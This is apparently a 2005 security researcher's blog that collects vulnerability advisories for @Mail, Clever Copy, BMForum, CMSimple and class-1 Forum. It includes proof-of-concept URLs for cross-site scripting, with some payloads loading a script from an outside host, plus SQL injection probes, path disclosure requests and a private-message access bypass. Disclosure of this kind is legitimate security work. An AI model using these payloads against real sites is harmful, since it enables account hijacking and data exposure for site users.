@Mail multiple variable cross-site scripting

Thursday, July 28, 2005
#############################################
@Mail multiple variable cross-site scripting
vendor url:http://www.atmail.com
Advisory:http://lostmon.blogspot.com/2005/07/
mail-multiple-variable-cross-site.html
vendor notify:yes exploit available: yes
OSVDB ID:18337,18338,18339,18340
Secunia: SA16252
BID: 14408
##############################################


@Mail is a feature rich Email solution that allows users to access
email-resources via the web or a variety of wireless devices. The
software incorporates a complete email-server package to manage
and host user email at your domain(s)


@Mail contains a flaw that allows a remote cross site scripting
attack.This flaw exists because the application does not validate
multiple variables upon submission to multiple scripts.This could
allow a user to create a specially crafted URL that would execute
arbitrary code in a user's browser within the trust relationship
between the browser and the server, leading to a loss of integrity.

#############
versions
#############

@Mail 4.03 WebMail for Windows
@Mail 4.11 - Linux / FreeBSD / Solaris / HP-UX / OS-X /

it is also posible other versions are vulnerable.

#################
solution
#################

Apply patch for version 4.11.
http://calacode.com/patch.pl

#################
Timeline
#################

Discovered:02-07-2005
vendor notify:27-07-2005
vendor response:28-07-2005
disclosure:28-07-2005


##################
Proof of comcepts
##################

For exploit this flaws, need a client login and for exploiting
all flaws in /webadmin/ need a admin login.

###################
princal.pl
###################

http://[victim]/printcal.pl?year=[XSS-CODE]&month=11&type=4

http://[victim]/printcal.pl?year=&month=11&type=4[XSS-CODE]

http://[victim]/printcal.pl?type=4[XSS-CODE]

###################
task.pl
###################

http://[victim]/task.pl?func=todo[XSS-CODE]

###################
compose.pl
####################

http://[victim]/compose.pl?id=cur/1117452847.H104572P10795.
[victim].com%3A2%2C&folder=Sent&cache=&func=reply
&type=reply[XSS-CODE]

http://[victim]/compose.pl?spellcheck=112253846919856.sc.new
&func=spellcheck&HtmlEditor=1&unique=19944&msgtype=r[XSS-CODE]

http://[victim]/compose.pl?spellcheck=112253846919856.sc.new
&func=spellcheck&HtmlEditor=1&unique=19944[XSS-CODE]&msgtype=r

http://[victim]/compose.pl?func=new&To=
lala@lala.es&Cc=&Bcc=[XSS-CODE]


http://[victim]/compose.pl?func=new&To=
lala@lala.es&Cc=[XSS-CODE]&Bcc=

http://[victim]/compose.pl?func=new&To=
lala@lala.es[XSS-CODE]&Cc=&Bcc=

###################
webadmin/filter.pl
###################

http://[victim]/webadmin/filter.pl?func=
viewmailrelay&Order=IPaddress[XSS-CODE]

http://[victim]/webadmin/filter.pl?func=filter
&Header=blacklist_from&Type=1[XSS-CODE]&View=1

http://[victim]/webadmin/filter.pl?func=filter
&Header=blacklist_from[XSS-CODE]&Type=1&View=1

http://[victim]/webadmin/filter.pl?
func=filter&Header=whitelist_from&Type=0&Display=1
&Sort=value[XSS-CODE]&Type=1&View=1



######################## €nd ##########################

Thnx to estrella to be my ligth

atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....

Clever Copy Unauthorized read & delete Private Messages

Wednesday, July 27, 2005
################################################
Clever Copy Unauthorized read & delete Private Messages
vendor url:http://clevercopy.bestdirectbuy.com
advisory:http://lostmon.blogspot.com/2005/07/
clever-copy-unauthorized-read-delete.html
vendor notify: yes exploit available:yes
OSVDB ID: 18509
Secunia : SA16236
BID:14397
################################################


Clever Copy is a free, fully scalable web site portal and news posting
system.You can run it as a very simple blog or ramp it up to a full
Content Management System

Clever Copy contains a flaw that allows a Unauthorized read & delete Private Messages from other users.

The flaw is done wen a authenticated user try to access directly to a
especial url to gain unauthorized access to private messages.

############
versions
############

Clever Copy 2.0
Clever Copy 2.0a

###############
Solution
###############

No solution at this time !!

###################
Timeline
###################

Discovered: 25-07-2005
Vendor notify:26-07-2005
Disclosure:27-07-2005

###################
proof of concept
###################

First we must be logged for have access to private messages
and go to this url:

http://[victim]/readpm.php?op=read&ID=2&name=pruebas&user=waltrapass

or

http://[victim]/readpm.php?op=read&ID=2&user=waltrapass

and we look the message 2 from waltrapass user :)

op= read or del
id= id from message what we like to look
name= username of user was send the private message
( this is not necessary to view or delete a message)
user= username from user what we try to look their PM

for delete a message we can go to similar url:

http://[victim]/readpm.php?op=del&ID=2&name=pruebas&user=waltrapass

or

http://[victim]/readpm.php?op=del&ID=2&user=waltrapass

##################### €nd #############################

thnxs to estrella to be my ligth
thnxs to http://www.osvdb.org/

atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....

Multiple Cross site scripting in BMForum

################################################
Multiple Cross site scripting in BMForum
vendor url:http://www.bmforum.com/
Advisore:http://lostmon.blogspot.com/2005/07/
multiple-cross-site-scripting-in.html
Vendor notify:yes Exploit available:yes
OSVDB ID:18306,18307,18308,18309,18310,18311,18312,18313,18314
Secunia: SA16224
BID: 14396
################################################


BMForum contains a flaw that allows a remote cross site scripting
attack.This flaw exists because the application does not validate
multiple variables upon submission to multiple scripts.This could
allow a user to create a specially crafted URL that would execute
arbitrary code in a user's browser within the trust relationship
between the browser and the server, leading to a loss of integrity.



####################
VERSIONS
####################

BMForum Datium! 3.0 RC4
BMForum Datium! 3.0 RC3
BMForum Datium! 3.0 RC2
BMForum Datium! 3.0 RC1
BMForum Plus! 3.0 RC4
BMForum Plus! 3.0 RC3
BMForum Plus! 3.0 RC2
BMForum Plus! 3.0 RC1
BMForum Plus!MX 3.0.0.5
BMForum Plus! 2.6.1


###################
Solution:
###################

No solution at this time.

###################
Timeline:
###################

Discovered: 21-07-2005
vendor notify:25-07-2005
Disclosure:27-07-2005

###################
Proof of XSS
####################

####################
topic.php
####################

http://[VICTIM]/bmb/topic.php?forumid=6&filename=38496&page=2[XSS-CODE]
http://[VICTIM]/bmb/topic.php?forumid=6&filename=38496[XSS-CODE]&page=2
http://[VICTIM]/topic.php?filename=1923[XSS-CODE]

#################
forums.php
#################

http://[VICTIM]/bmb/forums.php?forumid=6[XSS-CODE]
http://[VICTIM]/bmb/forums.php?forumid=6&listby=posttime[XSS-CODE]&jinhua=&page=
http://[VICTIM]/bmb/forums.php?forumid=6&listby=posttime&jinhua=[XSS-CODE]&page=
http://[VICTIM]/bmb/forums.php?forumid=6&listby=posttime&jinhua=&page=[XSS-CODE]


###################
post.php
###################

http://[VICTIM]/post.php?forumid=2\[XSS-CODE]

###################
announcesys.php
###################

http://[VICTIM]/announcesys.php?forumid=0[XSS-CODE]

#################
Others
#################

http://[VICTIM]/datafile/regipbans.php //ips baned.
http://[VICTIM]/bmb/datafile/sendmail.php // full path disclosure.
http://[VICTIM]/post_global.php //full path disclosure
http://[VICTIM]/bmb/datafile/bbslog2.txt //data disclosure
http://[VICTIM]/bmb/bbslog.txt // data disclosure

################### €nd ######################

thnx to estrella to be my ligth.

atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....

CMSimple 'search' variable XSS

Thursday, July 21, 2005
##############################################
CMSimple 'search' variable XSS
Vendor urL:http://www.cmsimple.dk/
Advisory:http://lostmon.blogspot.com/2005/07/
cmsimple-search-variable-xss.html
vendor fix:http://www.cmsimple.dk/
forum/viewtopic.php?t=2470
Vendor confirmed:YES exploit available:yes
OSVDB ID: 18128
Secunia: SA16147
BID: 14346
Securitytracker: 1014556
##############################################



CMSimple is a simple content management system; for the smart
maintenance of small commercial or private sites.
It is simple - small - smart!


CMSimple contains a flaw that allows a remote cross site scripting
attack.This flaw exists because the application does not validate
'search' variable upon submission to 'index.php' script.This could
allow a user to create a specially crafted URL that would execute
arbitrary code in a user's browser within the trust relationship
between the browser and the server, leading to a loss of integrity.

Index.php file contains only a include to cmsimple/cms.php file.


#############
VERSIONS
#############

CMSimple 2.4 and earlier versions


#############
Solution
#############

vendor fix:
http://www.cmsimple.dk/forum/viewtopic.php?t=2470

Fix:

function printlink(){global $f,$search,$file,$sn,$su,$tx;$t=amp().'print';if($f=='search')$t.=amp().'function=search'.amp().'search='.$search;

should be replaced with:

function printlink(){global $f,$search,$file,$sn,$su,$tx;$t=amp().'print';if($f=='search')$t.=amp().'function=search'.amp().'search='.htmlspecialchars(stripslashes($search));

Will be fixed in next beta.

#############
Timeline
#############

discovered: 13-07-2005
vendor notify:20-07-2005
vendor response:21-07-2005
vendor fix:21-07-2005
disclosure:21-07-2005


################
Proof of concept
################

http://[victim]/index.php?&print&function=search&search="><script src="http://www.drorshalev.com/dev/injection/js.js"></script>



http://[victim]/?function=search&search=[XSS-CODE]

http://[victim]/?&print&function=search&search=[XSS-CODE]

http://[victim]/?License&function=search&search=[XSS-CODE]

http://[victim]/?Resellers&function=search&search=[XSS-CODE]

http://[victim]/?&guestbook&function=search&search=[XSS-CODE]


###################### €nd #########################

Thnx to estrella to be my ligth
thnx to http://www.drorshalev.com/ for hosting 'js.js' script
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....

Clever copy Path disclosure and XSS

Monday, July 18, 2005
################################################
Clever copy Path disclosure and XSS
vendor url:http://clevercopy.bestdirectbuy.com
advisory:http://lostmon.blogspot.com/2005/07/
clever-copy-path-disclosure-and-xss.html
vendor notify: yes exploit available:yes
OSVDB ID: 18349,18350,18351,18352,18353,18354,18355,
18356,18357,18358,18359,18360,18361
Secunia: SA16236
BID:14395
################################################

Clever Copy is a free, fully scalable web site portal and news posting
system.You can run it as a very simple blog or ramp it up to a full
Content Management System

Clever Copy contains a flaw that allows a remote cross site scripting
attack.This flaw exists because the application does not validate
'searchtype' and 'searchterm' variables upon submission to
'results.php' and 'categorysearch.php' scripts.This could allow a user
to create a specially crafted URL that would execute arbitrary code in
a user's browser within the trust relationship between the browser and
the server, leading to a loss of integrity

##############
VERSIONS
##############

Clever Copy version 2.0a
Clever Copy version 2.0

##############
SOLUTION
##############

No solution at this time

##############
TIMELINE
##############

Discovered: 15-07-2005
Vendor notify: 18-07-2005
Vendor response: 18-07-2005
Disclosure: 19-07-2005

##############
EXPLOITS
##############

http://[VICTIM]/results.php?searchtype="><script src="
http://www.drorshalev.com/dev/injection/js.js"></script>
category&searchterm=Announcements

http://[VICTIM]/results.php?searchtype=category&searchterm=">
<scriptsrc="http://www.drorshalev.com/dev/injection/js.js&
quot;></script>Announcements


http://[VICTIM]/results.php?start=0&searchtype="><script
src="http://www.drorshalev.com/dev/injection/js.js"><
/script>category&searchterm=Announcements

http://[VICTIM]/results.php?start=0&searchtypecategory&searchterm=
Announcements="><script src="http://www.drorshalev
.com/dev/injection/js.js"></script>

http://[VICTIM]/categorysearch.php?star=0&searchtype="><
script src="http://www.drorshalev.com/dev/injection/js.js
"></script>category&searchterm=Announcements

http://[VICTIM]/categorysearch.php?star=0&searchtypecategory&
searchterm=Announcements"><script src="http://
www.drorshalev.com/dev/injection/js.js"></script>

################################
direct request path disclosure:
################################

http://[VICTIM]/ticker.php
http://[VICTIM]/menu.php
http://[VICTIM]/banned.php
http://[VICTIM]/endlayout.php
http://[VICTIM]/randomhlinesblock.php
http://[VICTIM]/showlast.php
http://[VICTIM]/showlast5class1.php
http://[VICTIM]/showlast5phorum.php
http://[VICTIM]/showlast5phorumblock.php
http://[VICTIM]/showlastforumbb2.php
http://[VICTIM]/showlastforumbb2block.php


######################## €nd #############################

Thnx to estrella to be my ligth
thnx to http://www.drorshalev.com/ for hosting 'js.js' script
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....

Clever copy 'calendar.php' 'yr' variable cross site scripting

Friday, July 15, 2005
################################################
Clever copy 'calendar.php' 'yr' variable cross site scripting
vendor url:http://clevercopy.bestdirectbuy.com
advisory:http://lostmon.blogspot.com/2005/07/
clever-copy-calendarphp-yr-variable.html
vendor notify: yes exploit available:yes
OSVDB ID:17919
Securitytracker: 1014492
BID: 14278
################################################

Clever Copy is a free, fully scalable web site portal and news posting
system.You can run it as a very simple blog or ramp it up to a full
Content Management System

Clever Copy contains a flaw that allows a remote cross site scripting
attack.This flaw exists because the application does not validate 'yr'
variable upon submission to 'calendar.php' script.This could allow a
user to create a specially crafted URL that would execute arbitrary
code in a user's browser within the trust relationship between
the browser and the server, leading to a loss of integrity

##############
VERSIONS
##############

Clever Copy version 2.0a
Clever Copy version 2.0

##############
SOLUTION
##############

No solution at this time

##############
TIMELINE
##############

Discovered: 12-07-2005
Vendor notify: 13-07-2005
Vendor response:14-07-2005
Disclosure: 15-07-2005

##############
EXPLOIT
##############

http://[victim]/calendar.php?mth=3&yr=2006"><script src="http://www.drorshalev.com/dev/injection/js.js"></script>

######################## €nd #############################

Thnx to estrella to be my ligth
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente...

class-1 Forum Software Cross site scripting

Thursday, July 14, 2005
#########################################################
class-1 Forum Software Cross site scripting.
Original advisore:http://lostmon.blogspot.com/2005/07/
class-1-forum-software-cross-site.html
Vendor url:http://www.class1web.co.uk/download_forum.php
Vendor notify: yes exploit available: yes
OSVDB ID:17920,17921,17922,17923
Secunia: SA16078
BID: 14261
Securitytracker: 1014485 1014486
##########################################################


class-1 Forum Software is a PHP/MySQL driven web forum

class-1 Forum contains a flaw that allows a remote cross site
scripting attack.This flaw exists because the application
does not validate 'viewuser_id' and 'group' variables upon
submission to 'users.php' script.This could allow a user to create
a specially crafted URL that would execute arbitrary code in a user's
browser within the trust relationship between the browser and
the server,leading to a loss of integrity

##################
versions
##################

class-1 Forum Software (v 0.23.2) vulnerable.
class-1 Forum Software (v 0.24.4) vulnerable.

it is posible that other versions are vulnerables too.

Clever Copy (http://clevercopy.bestdirectbuy.com/)
with forums module afected instaled.

Clever Copy 2.0
Clever Copy 2.0a

###################
Solution
###################

no solution at this time.

################
Timeline
################

discovered: 10-07-2005
vendor notify: 12-07-2005 (Webform)
vendor response:
2 vendor response:12-07-2005 (Clever Copy)
disclosure: 14-07-2005


##############################
proof of Cross site Scripting
##############################

http://[victim]/forum/users.php?mode=viewprofile&viewuser_id=89[XSS-code]

http://[victim]/forum/users.php?mode=viewgroup&group=Moderators[XSS-code]


#########################
posible SQL injections
#########################

http://www.class1web.co.uk/forum/viewattach.php?id=[SQL-Injection]

SQL Error
There was an error executing the query - SELECT * FROM attachments
WHERE attach_id='''
You have an error in your SQL syntax near ''''' at line 1

-------

http://[victim]/forum/users.php?mode=viewprofile&viewuser_id=[SQL-Injection]

There was an error executing the query - SELECT * FROM users
WHERE user_id='''
You have an error in your SQL syntax near ''''' at line 1

--------

http://[victim]/forum/viewforum.php?mode=view&id=[SQL-Injection]

There was an error executing the query - SELECT * FROM messages
WHERE id='''
You have an error in your SQL syntax near ''''' at line 1

---------

http://[victim]/forum/viewforum.php?forum=[SQL-Injection]

There was an error executing the query - SELECT * FROM group_permissions
WHERE forum_id=''' AND forum_hidden='1' AND group_name='Standard Users'
You have an error in your SQL syntax near '1' AND group_name='Standard Users'' at line 1

----------
#################### €nd ###########################

Thnx to estrella to be my ligth
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....
 

Browse

About:Me

My blog:http://lostmon.blogspot.com
Mail:Lostmon@gmail.com
Lostmon Google group
Lostmon@googlegroups.com

La curiosidad es lo que hace
mover la mente...